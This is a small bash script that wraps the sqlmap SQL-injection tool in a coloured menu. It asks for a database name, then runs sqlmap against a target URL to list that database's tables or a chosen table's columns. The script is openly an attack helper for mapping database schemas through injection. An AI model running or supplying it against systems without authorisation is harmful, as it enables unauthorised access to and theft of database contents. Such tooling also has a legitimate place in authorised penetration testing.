wog='\033[1;100m'
off='\033[0m'
fgr='\033[1;90m'
fr='\033[1;31m'
fg='\033[1;32m'
fy='\033[1;33m'
fb='\033[1;34m'
fp='\033[1;35m'
fs='\033[1;36m'
fw='\033[1;37m'
bow='\033[1;07m'
br='\033[0;41m'
bg='\033[0;42m'
by='\033[0;43m'
bb='\033[0;44m'
bp='\033[0;45m'
bs='\033[0;46m'
bw='\033[0;47m'
bk='\033[0;30m'
un='\033[0;04m'
it='\033[0;03m'


echo -e $fg " [>] enter the name of the database : "$fy "\c " $off
read db 

cd
cd sqlmap
cd temp 
echo database name : $db >> current.txt
chmod +x *
echo -e $off 
echo -e $fg"[=====> DATA RETRIEVAL SECTION <======]" $off 
echo -e $wog"[=]     1.retrieve table names      [=]" $off
echo -e $wog"[=]     2.retrieve columns names    [=]" $off
echo -e $fg"[=================><==================]" $off 
echo -e $off  " "
echo -e " [>] your choice : \c "
read c1 

case $c1 in 

1)
sqlmap -u $1 --thread=5 -D $db --tables 
echo -e $fs " DATABASE NAME : $db " $off 
echo -e $off ""
;;

2)
echo -e $fy " [>] enter the name of the table : " $fr"\c " $off
read tb 
sqlmap -u $1 --thread=5 -D $db -T $tb --columns 
echo -e $fs" DATABASE NAME : $db \n TABLE NAME : $tb" $off 
echo -e $off ""
;;

esac 

